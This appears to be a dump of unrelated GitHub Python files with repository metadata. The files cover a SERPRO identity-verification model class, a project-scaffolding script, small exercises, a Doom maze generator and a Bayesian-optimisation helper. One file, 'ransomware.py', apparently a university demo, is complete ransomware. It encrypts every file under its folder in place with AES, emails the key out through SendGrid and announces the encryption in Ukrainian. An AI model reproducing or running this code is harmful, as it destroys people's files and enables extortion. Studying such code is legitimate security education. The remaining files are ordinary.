field_dict["situacao_cpf"] = situacao_cpf
if sexo is not UNSET:
field_dict["sexo"] = sexo
if nacionalidade is not UNSET:
field_dict["nacionalidade"] = nacionalidade
if cnh is not UNSET:
field_dict["cnh"] = cnh
if filiacao is not UNSET:
field_dict["filiacao"] = filiacao
if documento is not UNSET:
field_dict["documento"] = documento
if endereco is not UNSET:
field_dict["endereco"] = endereco
if biometria_face is not UNSET:
field_dict["biometria_face"] = biometria_face
return field_dict
@classmethod
def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:
d = src_dict.copy()
nome = d.pop("nome", UNSET)
_data_nascimento = d.pop("data_nascimento", UNSET)
data_nascimento: Union[Unset, datetime.date]
if isinstance(_data_nascimento, Unset):
data_nascimento = UNSET
else:
data_nascimento = isoparse(_data_nascimento).date()
_situacao_cpf = d.pop("situacao_cpf", UNSET)
situacao_cpf: Union[Unset, PFFacialAnswerSituacaoCpf]
if isinstance(_situacao_cpf, Unset):
situacao_cpf = UNSET
else:
situacao_cpf = PFFacialAnswerSituacaoCpf(_situacao_cpf)
_sexo = d.pop("sexo", UNSET)
sexo: Union[Unset, PFFacialAnswerSexo]
if isinstance(_sexo, Unset):
sexo = UNSET
else:
sexo = PFFacialAnswerSexo(_sexo)
_nacionalidade = d.pop("nacionalidade", UNSET)
nacionalidade: Union[Unset, PFFacialAnswerNacionalidade]
if isinstance(_nacionalidade, Unset):
nacionalidade = UNSET
else:
nacionalidade = PFFacialAnswerNacionalidade(_nacionalidade)
_cnh = d.pop("cnh", UNSET)
cnh: Union[Unset, CNHAnswer]
if isinstance(_cnh, Unset):
cnh = UNSET
else:
cnh = CNHAnswer.from_dict(_cnh)
_filiacao = d.pop("filiacao", UNSET)
filiacao: Union[Unset, FiliacaoAnswer]
if isinstance(_filiacao, Unset):
filiacao = UNSET
else:
filiacao = FiliacaoAnswer.from_dict(_filiacao)
_documento = d.pop("documento", UNSET)
documento: Union[Unset, DocumentoAnswer]
if isinstance(_documento, Unset):
documento = UNSET
else:
documento = DocumentoAnswer.from_dict(_documento)
_endereco = d.pop("endereco", UNSET)
endereco: Union[Unset, EnderecoAnswer]
if isinstance(_endereco, Unset):
endereco = UNSET
else:
endereco = EnderecoAnswer.from_dict(_endereco)
_biometria_face = d.pop("biometria_face", UNSET)
biometria_face: Union[Unset, FaceAnswer]
if isinstance(_biometria_face, Unset):
biometria_face = UNSET
else:
biometria_face = FaceAnswer.from_dict(_biometria_face)
pf_facial_answer = cls(
nome=nome,
data_nascimento=data_nascimento,
situacao_cpf=situacao_cpf,
sexo=sexo,
nacionalidade=nacionalidade,
cnh=cnh,
filiacao=filiacao,
documento=documento,
endereco=endereco,
biometria_face=biometria_face,
)
pf_facial_answer.additional_properties = d
return pf_facial_answer
    @property
    def additional_keys(self) -> List[str]:
        """Keys of the properties that are not part of the declared schema."""
        return list(self.additional_properties.keys())
    def __getitem__(self, key: str) -> Any:
        """Dict-style read access to an additional (schema-unknown) property."""
        return self.additional_properties[key]
    def __setitem__(self, key: str, value: Any) -> None:
        """Dict-style write access to an additional (schema-unknown) property."""
        self.additional_properties[key] = value
    def __delitem__(self, key: str) -> None:
        """Remove an additional property; raises KeyError if it is absent."""
        del self.additional_properties[key]
    def __contains__(self, key: str) -> bool:
        """Return True if *key* is stored among the additional properties."""
        return key in self.additional_properties
| paulo-raca/python-serpro | serpro/datavalid/models/pf_facial_answer.py | pf_facial_answer.py | py | 7,851 | python | pt | code | 0 | github-code | 90 |
12286378308 | import os
def join(paths): return os.path.join(*paths)
# Scaffold the project layout: create every required directory (tracked via an
# empty .gitkeep) and every required empty file, relative to this script.
root_path = os.path.dirname(os.path.abspath(__file__))

# Directories that must exist; each one is materialized through its .gitkeep.
dirs = [
    join(["data", "raw"]),
    join(["data", "processed"]),
    join(["prediction_service", "model"]),
    "notebooks",
    "saved_models"]

# Empty placeholder files to create.
files = [
    "dvc.yaml",
    "params.yaml",
    ".gitignore",
    "app.py",
    join(["prediction_service", "__init__.py"]),
    join(["prediction_service", "prediction.py"]),
    join(["src", "__init__.py"]),
    join(["reports", "params.json"]),
    join(["reports", "scores.json"]),
    join(["tests", "conftest.py"]),
    join(["tests", "test_config.py"]),
    join(["tests", "__init__.py"]),
    join(["webapp", "static", "css", "main.css"]),
    join(["webapp", "templates", "index.html"]),
    join(["webapp", "templates", "404.html"]),
    join(["webapp", "templates", "base.html"]),
    join(["webapp", "static", "script", "index.js"]),
    join([".github", "workflows", "ci-cd.yaml"]),
    "README.md"]

# Both lists need the same treatment (ensure parent dirs, then touch the file),
# so represent each directory by its .gitkeep and use a single code path.
for target in [join([d, ".gitkeep"]) for d in dirs] + files:
    filedir = join([root_path, target])
    os.makedirs(os.path.dirname(filedir), exist_ok=True)
    # Mode "a" gives touch semantics: existing content is left intact.
    open(filedir, "a").close()
| guilherme9820/wine_quality | template.py | template.py | py | 1,284 | python | en | code | 0 | github-code | 90 |
5102881251 | import base64
import os
from base64 import b64encode
from Crypto.Cipher import AES
from base64 import b64decode
from Crypto.Random import get_random_bytes
from sendgrid import SendGridAPIClient
from sendgrid.helpers.mail import Mail
def send_email(key):
    """Email the base64-encoded AES key via SendGrid.

    NOTE(review): this file is an educational ransomware demo -- this function
    is the "key exfiltration" step. The SendGrid credential is read from the
    SENDGRID_API_KEY environment variable.
    """
    message = Mail(
        from_email='yargoryar@gmail.com',
        to_emails='yaryna.gorodietska@gmail.com',
        subject='b64_key',
        html_content=key
    )
    sg = SendGridAPIClient(os.environ.get('SENDGRID_API_KEY'))
    response = sg.send(message)
def test_encryption_on_one_word():
    """Smoke-test AES-OFB round-tripping on a short byte literal.

    The IV is pushed through base64 encode/decode the same way the real code
    handles it, to show the encoding preserves it.
    """
    data = b"YARYNA"
    key = get_random_bytes(16)
    cipher = AES.new(key, AES.MODE_OFB)
    ct_bytes = cipher.encrypt(data)
    print(ct_bytes)
    iv = b64encode(cipher.iv).decode('utf-8')
    try:
        iv = b64decode(iv)
        # A fresh cipher with the same key and IV must invert the encryption.
        cipher = AES.new(key, AES.MODE_OFB, iv=iv)
        pt = cipher.decrypt(ct_bytes)
        print("The message was: ", pt)
    except (ValueError, KeyError):
        print("Incorrect decryption")
def encryption(key, iv):
    """Encrypt every file under this script's directory in place (AES-OFB).

    WARNING(review): educational ransomware demo. The script excludes itself
    by path comparison; every other file is overwritten with ciphertext.
    """
    ransomware_path = os.path.realpath(__file__)
    folder_path = os.path.dirname(os.path.abspath(__file__))
    list_of_encrypted_files = []
    for root, dirs, files in os.walk(folder_path):
        for a_file in files:
            # NOTE(review): hard-coded backslash separator assumes Windows;
            # on POSIX the self-exclusion comparison below would never match.
            full_file_path=f"{root}\\{a_file}"
            if full_file_path != ransomware_path:
                file = open(full_file_path,"rb")
                data = file.read()
                file.close()
                file = open(full_file_path,"wb")
                # Fresh cipher per file so every file starts from the same IV.
                cipher = AES.new(key, AES.MODE_OFB, iv=iv)
                encr = cipher.encrypt(data)
                list_of_encrypted_files.append(a_file)
                file.write(encr)
                file.close()
    # User-facing messages are Ukrainian: "Attention! Files ... were encrypted".
    print("Увага!")
    print(f"Файли у {folder_path} і підпапках були зашифровані!")
    print(list_of_encrypted_files)
def decryption(iv):
    """Prompt for the base64 key and decrypt all files under this directory.

    Must be called with the same IV that was used for encryption. A key of the
    wrong length makes AES.new raise ValueError, which is reported as a failed
    decryption.
    """
    ui_key = input("Введіть ключ, щоб розшифрувати всі файли:")
    dkey=base64.b64decode(ui_key)
    try:
        ransomware_path = os.path.realpath(__file__)
        folder_path = os.path.dirname(os.path.abspath(__file__))
        for root,dirs,files in os.walk(folder_path):
            for a_file in files:
                # Same Windows-style path join and self-exclusion as encryption().
                full_file_path=f"{root}\\{a_file}"
                if full_file_path != ransomware_path:
                    file=open(full_file_path,"rb")
                    e_data=file.read()
                    file.close()
                    file=open(full_file_path,"wb")
                    d_cipher = AES.new(dkey, AES.MODE_OFB, iv=iv)
                    decr = d_cipher.decrypt(e_data)
                    file.write(decr)
                    file.close()
        print(f"Файли {folder_path} і підпапках були розшифровані!")
    except (ValueError, KeyError):
        print("Розшифрування не відбулось!Ви ввели неправильний ключ!")
def main():
    """Demo flow: generate a key, email it, encrypt, then prompt to decrypt."""
    key = get_random_bytes(16)
    b64_key = base64.b64encode(key).decode()
    send_email(b64_key)
    # This cipher is created only to obtain a random IV shared by both phases.
    cipher = AES.new(key, AES.MODE_OFB)
    iv = cipher.iv
    encryption(key, iv)
    decryption(iv)
main()
| yarynka28/university_project | ransomware.py | ransomware.py | py | 3,192 | python | en | code | 0 | github-code | 90 |
1332706372 | '''
349. Intersection of Two Arrays
Easy
Given two integer arrays nums1 and nums2, return an array of their intersection. Each element in the result must be unique and you may return the result in any order.
Example 1:
Input: nums1 = [1,2,2,1], nums2 = [2,2]
Output: [2]
Example 2:
Input: nums1 = [4,9,5], nums2 = [9,4,9,8,4]
Output: [9,4]
Explanation: [4,9] is also accepted.
'''
'''
UMPIRE
U
assumptions: arrays are not sorted, contains only integers
M
set?
P
s1 = set(nums1)
s2 = set(nums2)
result = s1.intersection(s2)
time: O(m + n + min(m,n))
create a dict for each value in nums1 as a key
by looping
loop through nums2
if num i in nums 2 is in dict
add to return list
time: O(m+n)
I
R
E
'''
def intersection(nums1, nums2):
    """Return the set of distinct values present in both input lists.

    Runs in O(m + n): each list is scanned once and membership tests are
    O(1) hash lookups.
    """
    # The previous version tallied counts of nums1 in a dict, but only
    # membership matters, so a plain set intersection is equivalent.
    return set(nums1) & set(nums2)
| dariusnguyen/algorithm_data_structure_replit | arrays_strings/aaa_arrays_intersection.py | aaa_arrays_intersection.py | py | 896 | python | en | code | 0 | github-code | 90 |
# Enter your code here. Read input from STDIN. Print output to STDOUT
# Reads two integer side lengths from stdin and prints an angle in degrees,
# suffixed with the degree sign. Presumably AB and BC are the legs of a
# right triangle (HackerRank "Find Angle MBC") -- TODO confirm against the
# problem statement.
import math
AB=int(input())
BC=int(input())
x=math.atan(BC/AB)
deg=math.degrees(x)
# 90 - atan(BC/AB) in degrees equals atan(AB/BC), the complementary angle.
a=90-deg
a=round(a)
a=str(a)
print(a+chr(176))  # chr(176) is the degree sign '°'
| redietamare/competitive-programming | find-angle-MBC.py | find-angle-MBC.py | py | 201 | python | en | code | 0 | github-code | 90 |
7311384778 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Oct 16 11:35:10 2018
@author: anonymous
cd /home/adam/Bureau
"""
import shutil
import random
import numpy as np
#These are used to write the wad file
from omg.wad import WAD
from scenario_generation.maze_functions import create_green_armor, create_red_armor, create_line_def, create_map_point, create_vertex, create_object
from scenario_generation.maze_functions import create_sector, create_side_def, create_spawn, gen_random_maze, create_red_pillar, create_green_pillar
import level_maker
import json
def create_maze(base_filepath, filename, width, height, rw, rh, cell_size):
    """Generate a Doom scenario: a UDMF-text .wad, its .cfg, and a .json
    sidecar describing the generated geometry.

    Parameters
    ----------
    base_filepath : str
        Output directory prefix (expected to end with '/').
    filename : str
        Name of the .wad file to write, extension included.
    width, height, rw, rh, cell_size :
        Legacy maze parameters; currently unused -- the layout comes from
        ``level_maker.draw_level`` instead.
    """
    # Load the template wad and copy the template cfg next to the output.
    BASE_WAD = 'custom_scenario.wad'
    wad = WAD('scenarios/basefiles/' + BASE_WAD)
    BASE_CFG = 'custom_scenario.cfg'
    cfg_filename = '{}{}.cfg'.format(base_filepath, filename[:-4])
    shutil.copy('scenarios/basefiles/' + BASE_CFG, cfg_filename)

    # The cfg must reference the wad by bare name, with no directory part.
    if '/' in filename:
        wad_filename = filename.split('/')[-1]
    else:
        wad_filename = filename

    # Point the copied .cfg at the new wad name.
    with open('scenarios/basefiles/' + BASE_CFG, 'r') as file:
        filedata = file.read()
    filedata = filedata.replace(BASE_WAD, wad_filename)
    with open(cfg_filename, 'w') as file:
        file.write(filedata)

    details = {}
    verticies = []
    wall_cons = []  # pairs of vertex indices forming wall edges
    wall_idx = 0
    output_list = ['// Written by anonymous', 'namespace="zdoom";']

    # Exterior boundary of the level (closed rectangle), plus the generated
    # interior walls and player spawn from the level maker.
    ext_height = 1600
    ext_width = 1600
    padding = 0
    exterior = [(-padding, -padding), (-padding, ext_height + padding),
                (ext_width + padding, ext_height + padding),
                (ext_width + padding, -padding), (-padding, -padding)]
    walls, spawn = level_maker.draw_level(height=ext_height, width=ext_width)
    verticies += exterior[:-1]
    details['exterior'] = exterior[:-1]
    details['walls'] = walls

    # Connect the 4 exterior corners into a closed loop.
    for k in range(4):
        wall_cons.append((wall_idx + k, wall_idx + ((k + 1) % 4)))
    wall_idx += 4

    # Turn each (x0, y0, x1, y1) segment into a thin closed rectangle.
    pad = 8  # wall half-thickness
    for wall in walls:
        x0, y0, x1, y1 = wall
        if x0 == x1:
            # Vertical wall: thicken along x.
            verticies += [(x0 - pad, y0), (x1 + pad, y0),
                          (x1 + pad, y1), (x0 - pad, y1)]
        else:
            # Horizontal wall: thicken along y.
            verticies += [(x0, y0 - pad), (x1, y0 - pad),
                          (x1, y1 + pad), (x0, y1 + pad)]
        for k in range(4):
            wall_cons.append((wall_idx + k, wall_idx + ((k + 1) % 4)))
        wall_idx += 4

    # Emit UDMF records: vertices, then one linedef + sidedef per wall edge,
    # then a single sector (textures can be customized in the helpers).
    for vx, vy in verticies:
        output_list += create_vertex(vx, vy)
    for id1, id2 in wall_cons:
        output_list += create_line_def(id1, id2)
        output_list += create_side_def()
    output_list += create_sector()

    # Player spawn point.
    spawn = (spawn[0], spawn[1])
    output_list += create_spawn(spawn[0], spawn[1])
    details['spawn'] = spawn

    # BUGFIX: write the .json sidecar only after 'spawn' has been recorded.
    # Previously it was dumped right after the walls, so the 'spawn' key was
    # silently dropped from the file.
    with open(base_filepath + filename[:-4] + '.json', 'w') as f:
        json.dump(details, f)

    # Assemble the TEXTMAP lump and save the wad.
    output_string = ''
    for output in output_list:
        output_string += output + '\n'
    wad.data['TEXTMAP'].data = output_string.encode()
    wad.to_file(base_filepath + filename)
if __name__ == '__main__':
    BASE_FILEPATH = "scenarios_transfer_learning/scenes/"
    NUM_MAZES = 1
    # Legacy maze-grid parameters forwarded to create_maze (currently ignored
    # by it); width/height are fixed to 1 and rh is always randint(1, 1) == 1.
    width=[1]*NUM_MAZES
    rw=[random.randint(5, 8) for i in range(NUM_MAZES)]
    height=[1]*NUM_MAZES
    rh=[random.randint(1, 1) for i in range(NUM_MAZES)]
    # Generate NUM_MAZES .wad files
    for m in range(0, NUM_MAZES):
        filename = 'custom_scenario{:003}.wad'.format(m)
        print('creating maze', filename)
        create_maze(BASE_FILEPATH, filename, width[m], height[m], rw[m], rh[m], 200)
| Tzekh/PAr135_AIxplicability | Programs/3dcdrl/generate_scene.py | generate_scene.py | py | 4,553 | python | en | code | 0 | github-code | 90 |
898013209 | import numpy as np
from methods.oei import OEI
import gpflow
import sys
sys.path.append('..')
from benchmark_functions import scale_function, hart6
def create_model(batch_size=2):
    """Build and warm-start an OEI Bayesian-optimization model.

    The objective is the scaled Hartmann-6 benchmark; the surrogate uses a
    Matern-3/2 kernel without ARD. One round of ``bayesian_optimization`` is
    run so the returned model is already initialized.

    Parameters
    ----------
    batch_size : int
        Number of points evaluated per BO batch (default 2).
    """
    # Prepare the benchmark objective: numpy-ify its bounds, then scale it.
    objective = hart6()
    objective.bounds = np.asarray(objective.bounds)
    objective = scale_function(objective)

    options = {
        'samples': 0,
        'priors': 0,
        'batch_size': batch_size,
        'iterations': 5,
        'opt_restarts': 2,
        'initial_size': 10,
        'model_restarts': 10,
        'normalize_Y': 1,
        'noise': 1e-6,
        'nl_solver': 'bfgs',
        'hessian': True,
        'objective': objective,
    }
    options['kernel'] = gpflow.kernels.Matern32(
        input_dim=options['objective'].bounds.shape[0], ARD=False
    )
    options['job_name'] = 'tmp'

    bo = OEI(options)
    # Initialize the model by running the optimization loop once.
    bo.bayesian_optimization()
    return bo
| oxfordcontrol/Bayesian-Optimization | tests/create_model.py | create_model.py | py | 993 | python | en | code | 44 | github-code | 90 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.